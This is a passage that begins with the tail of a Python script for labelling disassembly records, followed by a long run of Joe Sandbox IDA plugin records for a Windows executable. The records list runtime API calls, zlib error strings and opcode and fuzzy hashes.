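def classify(rec, min_symbols=5):
    """Heuristic labels (inference from strings, not a report verdict)."""
    labels = []
    if "GetProcAddress" in rec.call_names and len(python_symbols(rec)) >= min_symbols:
        labels.append("python-capi-resolver")
    if ZLIB_INFLATE_MARKERS & set(rec.strings):
        labels.append("zlib-inflate")
    return labels


def triage(text):
    """(API ID, labels) per record, in report order."""
    return [(r.fields.get("API ID", ""), classify(r)) for r in parse_records(text)]


if __name__ == "__main__":
    for api_id, labels in triage(SAMPLE_REPORT):
        print(f"{api_id[:40]:40} {labels}")
```

Running it over the three records labels the GetProcAddress function as the C-API resolver (seven `Py*` names in the shortened sample, far more in the real record) and the string-only function as zlib inflate; the unhandled-exception-filter function gets no label. The threshold on `Py*` names exists so that a function referencing one or two Python strings in passing is not flagged.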
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                                              • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                              • Instruction ID: a34d1c2bd872d6ac2a92cb46ed2bb1fcc56650d32559f5c199ae5cbcbeb2ab7c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4231FA73609B8586EB609F64E8807AE6374FB84748F44403ADB4E87BA9EF79D548C710
APIs
• _get_daylight.LIBCMT ref: 00007FF6B7525C45
  • Part of subcall function 00007FF6B7525598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B75255AC
  • Part of subcall function 00007FF6B751A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A95E
  • Part of subcall function 00007FF6B751A948: GetLastError.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A968
  • Part of subcall function 00007FF6B751A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6B751A8DF,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751A909
  • Part of subcall function 00007FF6B751A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6B751A8DF,?,?,?,?,?,00007FF6B751A7CA), ref: 00007FF6B751A92E
• _get_daylight.LIBCMT ref: 00007FF6B7525C34
  • Part of subcall function 00007FF6B75255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B752560C
• _get_daylight.LIBCMT ref: 00007FF6B7525EAA
• _get_daylight.LIBCMT ref: 00007FF6B7525EBB
• _get_daylight.LIBCMT ref: 00007FF6B7525ECC
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6B752610C), ref: 00007FF6B7525EF3
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID:
• API String ID: 4070488512-0
• Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
• Instruction ID: 95f0c04069e4de3d30322c73e55e1f1e83f292b0eeba1eaea1bfc8591df2b883
• Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
• Instruction Fuzzy Hash: B1D1AE37F1C25286E7209F2AD8811B96761EF84794F448136EB4EC7AB5EF3CE8518740
APIs
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
• Instruction ID: 6b311e013661d88019044c8d22ac4984071de2e1b38d022f686d164072ab9c7d
• Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
• Instruction Fuzzy Hash: 52313D3761CB8186DB608F29E8402AE73A4FB88758F540139EB9D83BA5EF38D555CB00
APIs
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
• API String ID: 2227656907-0
• Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
• Instruction ID: e0dc1134c1ede4e01cd5a65e05e741f536f6f00a3cfd438340bcb22d5fea85c2
• Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
• Instruction Fuzzy Hash: 8CB1B423B1C69241EA61DF2A99002BA63A1EF44BE4F545131EF5D9BBE5EF3CE841C300
APIs
• _get_daylight.LIBCMT ref: 00007FF6B7525EAA
  • Part of subcall function 00007FF6B75255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B752560C
• _get_daylight.LIBCMT ref: 00007FF6B7525EBB
  • Part of subcall function 00007FF6B7525598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B75255AC
• _get_daylight.LIBCMT ref: 00007FF6B7525ECC
  • Part of subcall function 00007FF6B75255C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B75255DC
  • Part of subcall function 00007FF6B751A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A95E
  • Part of subcall function 00007FF6B751A948: GetLastError.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A968
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6B752610C), ref: 00007FF6B7525EF3
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 3458911817-0
• Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
• Instruction ID: c97ae06fdf2f689c01fc93bfbba8d2e3fb59e61bf1d702adbaa5a3a2cea08dfb
• Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
• Instruction Fuzzy Hash: FC514C33A1C64286E720DF29D8815B97761FB88794F414136EB4EC7AB6DF3CE4518740
APIs
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                                              • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                              • Instruction ID: cf0a4ed76acf0aa4311c429a08e1263f8d6a44b67f07f7297b7b6e0ae947c764
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83111822B18B058AEB008B64E8542B933B4FB59758F440E35DB6D867B4EF7CD1A48340
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy_s
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1502251526-0
                                                                                                                                                                                                                                              • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                              • Instruction ID: 601a0e4293ab647a45b9383ee527b1c981a714c36bc16888c8880a96185d4792
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02C1C273B1C68687EB24CF19A08466AB7A1F794B84F448139DB4A87754DF3DF845CB40
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                              • API String ID: 0-1127688429
                                                                                                                                                                                                                                              • Opcode ID: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                                              • Instruction ID: f328cc24e92a5a2d30199ea6942a91f25cef5fa3d795294d50fc0d8a211be7e3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fcf6ea83c7a46010d3591867e81b0f53761d3f113121264a3729654d2d1b513f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99F15C73A1C3D58BE7A58B198488B3A7BA9FF44748F064538DB49977A0DF38E941CB40
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 15204871-0
                                                                                                                                                                                                                                              • Opcode ID: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                              • Instruction ID: 7be3d53748a90afa59bccd96d0c371f9e6a621f93462c424d6e0a1c09e6cf082
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4cc0e8a2f7e024105bf8074fef1866164229a93701b52dcf00f6f20498becf3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CBB14A77A08B898AEB59CF2DC8463687BA0F784B58F198925DB9D837B4CF39D451C700
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: $
                                                                                                                                                                                                                                              • API String ID: 0-227171996
                                                                                                                                                                                                                                              • Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                              • Instruction ID: 7f31bcc0609cb379b250bf68ddde32083ede4d60108d503b314ebf606df551d2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50E17F73A0C66686EB68CF2D816017D37A0FF45B8AF245235DB4E87AB4DF29E851C740
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                              • API String ID: 0-900081337
                                                                                                                                                                                                                                              • Opcode ID: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                                              • Instruction ID: 5ac1a15439891cae0778529dfff3911d9fa9c2efe121f4448197dc16084a152e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6916373A1C28687E7A58F19D488B7E3BA9FF44758F114539DB4A867A0DF38E940CB40
                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
• Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                                              • Instruction ID: 3bdec0aff116ea5f2195a02f7795df88b9dd7369bd0b0709ea2903afbe819607
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FC19D762181E08BD28AEB29E4794BA73E1F78930DB95406BEF87477C5CB3CA414DB10
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                                              • Instruction ID: b8186916a7a7b0fdadd1537f5189750fec0eb3dbda852a7e522226e3b00c7316
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95B14D73A0C7A985E7658F2DC45027C3BA0EB49B49F284239CB4E87BA5CF39D642C745
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                                              • Instruction ID: 24be17837fb870d6ec28def5981927c6b35f4e96fea805c0ade4400fc678fd59
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD81B173A0C7918AEB74CF1DA49036A6A91FB45796F544235DB9D83FA9DF3CE4808B00
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 15e29a2b048034b7d11d1b87b7baa88ea743f66ca2db996e50da050e1c2114ce
                                                                                                                                                                                                                                              • Instruction ID: a1860a0f502537ca4a19840db6f08710e39de27cceefa18e1387818d1d3b1c93
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15e29a2b048034b7d11d1b87b7baa88ea743f66ca2db996e50da050e1c2114ce
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2161CF23F1C29246FB648B6D9450A7D6691EF41760F584239EB6FC3EE5DE6EE8408B00
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                              • Instruction ID: 86c7fd914bba617098c90e4d8e2cc3d875e15962e82ef2b8d7d14b1f7df4e83b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B3517077A1CA6186EB648F2DC04022837A0EB45B69F248275DF4D97BE4CF3AE853C740
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                              • Instruction ID: 8d03e417a184b44e0df5f6f3771f924942ba28921513dd3842cd7ba1b0f0f274
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B516037B1C66986E7248F2DC44026C33A1EB58B59F254131CB5D87BA4CF3AEA53C780
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
